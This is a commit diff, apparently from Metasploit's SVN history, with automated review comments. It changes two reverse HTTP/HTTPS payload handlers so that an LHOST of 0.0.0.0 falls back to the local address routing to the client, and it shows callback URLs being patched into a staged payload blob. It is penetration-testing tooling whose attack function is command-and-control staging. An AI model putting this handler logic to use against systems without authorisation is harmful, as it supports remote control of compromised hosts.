Handle situations where the user set LHOST to 0.0.0.0 in the handler by defaulting LHOST to our locally visible IP for the specific client. Solves some integration issues where 0.0.0.0 was accidentally used.
git-svn-id: file:///home/svn/framework3/trunk@13782 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
4d850c1ee6
commit
616913c4c1
|
@ -123,13 +123,21 @@ protected
|
||||||
|
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
|
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
|
||||||
|
|
||||||
|
|
||||||
|
lhost = datastore['LHOST']
|
||||||
|
|
||||||
|
# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
|
||||||
|
if lhost.empty? or lhost == '0.0.0.0'
|
||||||
|
lhost = Rex::Socket.source_address(cli.peerhost)
|
||||||
|
end
|
||||||
|
|
||||||
# Process the requested resource.
|
# Process the requested resource.
|
||||||
case req.relative_resource
|
case req.relative_resource
|
||||||
when /^\/INITJM/
|
when /^\/INITJM/
|
||||||
print_line("java: #{req.relative_resource}")
|
print_line("Java: #{req.relative_resource}")
|
||||||
|
|
||||||
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
||||||
url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
||||||
print_line "URL: #{url.inspect}"
|
print_line "URL: #{url.inspect}"
|
||||||
|
|
||||||
blob = ""
|
blob = ""
|
||||||
|
@ -178,7 +186,7 @@ protected
|
||||||
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
||||||
i = blob.index("https://" + ("X" * 256))
|
i = blob.index("https://" + ("X" * 256))
|
||||||
if i
|
if i
|
||||||
url = "http://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
url = "http://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
||||||
blob[i, url.length] = url
|
blob[i, url.length] = url
|
||||||
end
|
end
|
||||||
print_status("Patched URL at offset #{i}...")
|
print_status("Patched URL at offset #{i}...")
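Review bot: `lhost.empty?` in the new guard raises NoMethodError if `datastore['LHOST']` can be nil (option unset), because the value is used without coercion. `if lhost.to_s.empty? || lhost == '0.0.0.0'` avoids that and replaces the low-precedence `or` with `||`. The comparison covers only the IPv4 wildcard, so an IPv6 wildcard such as `::` would still be written into the URL unchanged. The same guard is added in the second file section (hunk -124,11 +124,18), so the point applies there as well. The enclosing method starts and ends outside the hunk.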
|
||||||
|
|
|
@ -124,11 +124,18 @@ protected
|
||||||
|
|
||||||
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
|
print_status("#{cli.peerhost}:#{cli.peerport} Request received for #{req.relative_resource}...")
|
||||||
|
|
||||||
|
lhost = datastore['LHOST']
|
||||||
|
|
||||||
|
# Default to our own IP if the user specified 0.0.0.0 (pebkac avoidance)
|
||||||
|
if lhost.empty? or lhost == '0.0.0.0'
|
||||||
|
lhost = Rex::Socket.source_address(cli.peerhost)
|
||||||
|
end
|
||||||
|
|
||||||
# Process the requested resource.
|
# Process the requested resource.
|
||||||
case req.relative_resource
|
case req.relative_resource
|
||||||
when /^\/INITJM/
|
when /^\/INITJM/
|
||||||
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
||||||
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
||||||
#$stdout.puts "URL: #{url.inspect}"
|
#$stdout.puts "URL: #{url.inspect}"
|
||||||
|
|
||||||
blob = ""
|
blob = ""
|
||||||
|
@ -176,7 +183,7 @@ protected
|
||||||
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
conn_id = "CONN_" + Rex::Text.rand_text_alphanumeric(16)
|
||||||
i = blob.index("https://" + ("X" * 256))
|
i = blob.index("https://" + ("X" * 256))
|
||||||
if i
|
if i
|
||||||
url = "https://#{datastore['LHOST']}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
url = "https://#{lhost}:#{datastore['LPORT']}/" + conn_id + "/\x00"
|
||||||
blob[i, url.length] = url
|
blob[i, url.length] = url
|
||||||
end
|
end
|
||||||
print_status("Patched URL at offset #{i}...")
|
print_status("Patched URL at offset #{i}...")
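Review bot: The LHOST fallback block in this section is a line-for-line copy of the one added in the first file section (hunk -123,13 +123,21), so the two handlers can drift apart on the next fix. A single helper that returns the effective host for `cli` would keep them consistent, assuming the handlers share a mixin or base class, which the page does not show. The comment would be more useful if it stated the rule, e.g. `# Use the local address that routes to this client when LHOST is empty or the 0.0.0.0 wildcard`. The later hunk (-176,7 +183,7) reads `lhost` well after it is assigned, which only works if both sit in the same method; that is not visible here.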
|
||||||
|
|